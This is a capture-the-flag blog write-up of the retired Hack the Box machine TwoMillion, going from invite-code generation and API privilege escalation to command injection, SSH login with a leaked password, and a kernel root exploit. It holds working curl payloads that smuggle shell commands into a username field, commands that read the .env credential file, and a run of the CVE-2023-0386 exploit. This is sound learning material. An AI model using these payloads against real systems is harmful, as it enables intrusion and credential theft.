Trance Shift 8 - Tech

Notes where I write up CTFs.

Writeup | Hack the Box: TwoMillion

app.hackthebox.com

  • Used Guided mode
  • Retired Free Machine

It's been quite a while since the last one, so this is partly a warm-up.

nmap

└─$ nmap 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:36 JST
Nmap scan report for 10.10.11.221
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 666.89 seconds

Web server

~/dev/hack 🐶💭❯ curl --verbose http://10.10.11.221
*   Trying 10.10.11.221:80...
* Connected to 10.10.11.221 (10.10.11.221) port 80
...
< HTTP/1.1 301 Moved Permanently
< Server: nginx
...
< Location: http://2million.htb/

It redirects; the server seems to expect the host 2million.htb.

~/dev/hack 🐶💭❯ cat /etc/hosts | tail -n 1
10.10.11.221 2million.htb

Fiddling with settings is a hassle, so I just added it to /etc/hosts.

The site renders normally at http://2million.htb.

It looks like it simply redirects any request that does not carry that Host header.

Register via /invite

  • /js/inviteapi.min.js

pretty print

It's a bit tricky: the code is assembled with eval. Since it seems to be expanded into the global scope, you can call it from the browser console.

makeInviteCode()
undefined
Object { 0: 200, success: 1, data: {…}, hint: "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..." }

I think makeInviteCode() is the one.

It helpfully says ROT13.

In order to generate the invite code, make a POST request to /api/v1/invite/generate
~/dev/hack 🐶💭❯ curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"RjIxNkktMzRaRkwtTVFBTUQtMjFMQTg=","format":"encoded"}}%

Probably Base64 => decoding it with CyberChef or similar gives F216I-34ZFL-MQAMD-21LA8

Nice.

After logging in, look for the Connection Pack. It's probably about the VPN, and searching turned it up under Access.

GET /api/v1/user/vpn/generate

Looking at http://2million.htb/api/v1, the whole API is carelessly listed as JSON, and it includes admin-related endpoints.

PUT /api/v1/admin/settings/update    "Update user settings"

This one looks suspicious, but first let's look at the auth endpoints.

GET /api/v1/user/auth
GET /api/v1/admin/auth

Using user/auth as a reference, probe the behavior of admin/auth. The session appears to be cookie-based, so:

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/user/auth
{"loggedin":true,"username":"skyriser","is_admin":0}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":false}

Send a plausible-looking request.

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":"1"}' --verbose
...
* Connection #0 to host 2million.htb left intact
{"status":"danger","message":"Missing parameter: email"}

It seems to accept JSON requests. Let's just make ourselves admin.

I tried various things as admin, but they don't seem relevant.

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":1,"email":"skyriser@example.com"}' --verbose
{"id":15,"username":"skyriser","is_admin":1}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":true}

The one I haven't tried yet is this.

POST /api/v1/admin/vpn/generate Generate VPN for specific user
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin"}'
...

You can simply download another user's OpenVPN profile, but this smells like a directory-traversal-style bug, so tampering with username should let you do something bad.

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls;"}'
Database.php
Router.php
VPN
assets
controllers
css
fonts
images
index.php
js
views

It worked.
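As an added illustration (not code from the box or from the author), the following Python shows how the two server-side weaknesses used above would be closed: the settings/update handler allow-lists the fields a user may change so is_admin cannot be set from the request body, and the VPN generator validates username against an allow-list and passes it as a single argv element instead of through a shell. The field list and the generator path are assumptions for this example.

```python
import re
import subprocess

# Fields a logged-in user may change about their own account (assumption for
# this example). is_admin is deliberately absent: it comes from the session.
USER_EDITABLE_FIELDS = {"username", "email"}
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
VPN_GENERATOR = "/usr/local/bin/generate-vpn-profile"  # placeholder path, not the box's


class RequestError(ValueError):
    """Raised for a client error; the handler would map it to a 4xx JSON reply."""


def is_valid_username(username) -> bool:
    """Allow-list check: letters, digits, '_' and '-' only, no shell metacharacters."""
    return isinstance(username, str) and USERNAME_RE.match(username) is not None


def sanitize_settings_update(payload: dict, current_user: dict) -> dict:
    """Return the columns that may actually be written for current_user.

    Keys outside the allow-list (such as is_admin) are dropped instead of being
    passed straight through to the database, and the mandatory email field is
    enforced as the original handler already does.
    """
    if "email" not in payload:
        raise RequestError("Missing parameter: email")
    update = {k: v for k, v in payload.items() if k in USER_EDITABLE_FIELDS}
    if "username" in update and not is_valid_username(update["username"]):
        raise RequestError("Invalid username")
    # The privilege flag is carried over from the authenticated session, never the body.
    update["is_admin"] = current_user["is_admin"]
    return update


def vpn_generate_argv(username: str) -> list:
    """Build the argv for the profile generator; the username is one argument."""
    if not is_valid_username(username):
        raise RequestError("Invalid username")
    return [VPN_GENERATOR, "--user", username]


def generate_vpn(username: str) -> bytes:
    # A list plus shell=False (the default) means /bin/sh is never involved, so
    # 'admin;ls;' is rejected by the validator rather than executed.
    return subprocess.run(vpn_generate_argv(username), check=True,
                          capture_output=True).stdout
```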

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;whoami;"}'
www-data
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la;"}'
total 56
drwxr-xr-x 10 root root 4096 Jun  8 02:40 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Jun  8 02:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la /home/admin;"}'
total 32
drwxr-xr-x 4 admin admin 4096 Jun  7 14:18 .
drwxr-xr-x 3 root  root  4096 Jun  6  2023 ..
lrwxrwxrwx 1 root  root     9 May 26  2023 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 May 26  2023 .bash_logout
-rw-r--r-- 1 admin admin 3771 May 26  2023 .bashrc
drwx------ 2 admin admin 4096 Jun  6  2023 .cache
-rw------- 1 admin admin    0 Jun  7 14:18 .lesshsQ
-rw-r--r-- 1 admin admin  807 May 26  2023 .profile
drwx------ 2 admin admin 4096 Jun  6  2023 .ssh
-rw-r----- 1 root  admin   33 Jun  7 08:54 user.txt

user.txt is set up so that www-data cannot read it.

The hint is .env

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;cat .env;"}'
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

user.txt

SSH is open, so try the password above.

$ ssh admin@2million.htb
admin@2million.htb's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)

admin@2million:~$ cat user.txt 
XXX

Got right in. I see how it is.

Look at the mail

The next hint is:

What is the email address of the sender of the email sent to admin?

Take a look at the mail spool.

admin@2million:/var/spool/mail$ ls
admin
admin@2million:/var/spool/mail$ pwd
/var/spool/mail
...
Subject: Urgent: Patch System OS
...
There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty.

It's saying there's a vulnerability.

This looks like it. It even says privilege escalation.

Privilege Escalation

github.com

I'll make use of this.

$ scp CVE-2023-0386-main.zip admin@2million.htb:/home/admin/
admin@2million.htb's password: 
CVE-2023-0386-main.zip                     100%   11KB  30.6KB/s   00:00
admin@2million:~$ ls
CVE-2023-0386-main.zip  user.txt
admin@2million:~$ unzip CVE-2023-0386-main.zip 
Archive:  CVE-2023-0386-main.zip
acc49811a9083381c28db9ec296774e6a82be419
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile  
  inflating: CVE-2023-0386-main/README.md  
  inflating: CVE-2023-0386-main/exp.c  
  inflating: CVE-2023-0386-main/fuse.c  
  inflating: CVE-2023-0386-main/getshell.c  
   creating: CVE-2023-0386-main/ovlcap/
 extracting: CVE-2023-0386-main/ovlcap/.gitkeep  
   creating: CVE-2023-0386-main/test/
  inflating: CVE-2023-0386-main/test/fuse_test.c  
  inflating: CVE-2023-0386-main/test/mnt  
  inflating: CVE-2023-0386-main/test/mnt.c
# Term 1
admin@2million:~/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
[+] readdir
...
# Term 2
admin@2million:~/CVE-2023-0386-main$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Jun  8 03:17 .
drwxrwxr-x 6 root   root     4096 Jun  8 03:17 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:~/CVE-2023-0386-main# whoami
root

Done!

root.txt

root@2million:~# cd /root/
root@2million:/root# pwd
/root
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt 
XXX